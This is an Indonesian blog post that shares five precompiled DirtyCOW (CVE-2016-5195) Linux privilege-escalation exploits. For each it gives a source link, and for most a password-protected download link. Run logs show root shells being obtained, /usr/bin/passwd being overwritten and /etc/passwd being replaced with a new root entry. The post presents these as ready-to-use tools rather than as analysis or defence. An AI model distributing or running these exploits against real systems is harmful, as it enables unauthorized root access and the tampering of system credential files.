CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit

Yooo.. kali ini mau share koleksi localroot dirtycow aja. barangkali ada yang butuh atau error saat compile. Soalnya yang saya share ini versi compile jadi tinggal pakai.

1. naughtyc0w
Source : https://gist.github.com/mak/c36136ccdbebf5ecfefd80c0f2ed6747
Download File : https://goo.gl/r1CnDT (password : linuxsec)
logs :
./naughty 0
[*] let make some c0ws dirty
[+] ok we have some dirty things going on
2. c0w
Source : https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54
Download File 64bit : https://goo.gl/5N9JOs (password : linuxsec)
Download File 32bit : https://goo.gl/iNFH30 (password : linuxsec)
logs :
./c0w
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
mmap fa65a000madvise 0ptrace 0
$ /usr/bin/passwd
[[email protected] foo]# whoami
root
[[email protected] foo]# id
uid=0(root) gid=501(foo) groups=501(foo)
3. dcow
Source : https://github.com/gbonacini/CVE-2016-5195
Download File : https://goo.gl/71lKdt (password : linuxsec)
logs :
./dcow -s
Running …
Root password is:   dirtyCowFun
Received su prompt (Password: )
[[email protected] foo]# whoami
root
4. cowroot
Source : https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679
Download File : https://goo.gl/kELZXw (password : linuxsec)
logs :
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 27832
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
[[email protected] public_html]# whoami
root
5. dirty
Source : https://github.com/FireFart/dirtycow/blob/master/dirty.c
logs :
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: linuxsec
Complete line:
root:fiDHk6SmQq4KQ:0:0:pwned:/root:/bin/bash
mmap: 7f2e24495000
madvise 0
ptrace 0
..
Oke sekian artikel kali ini, kalo ada yang kurang jelas komen aja.
Shares

Leave a Reply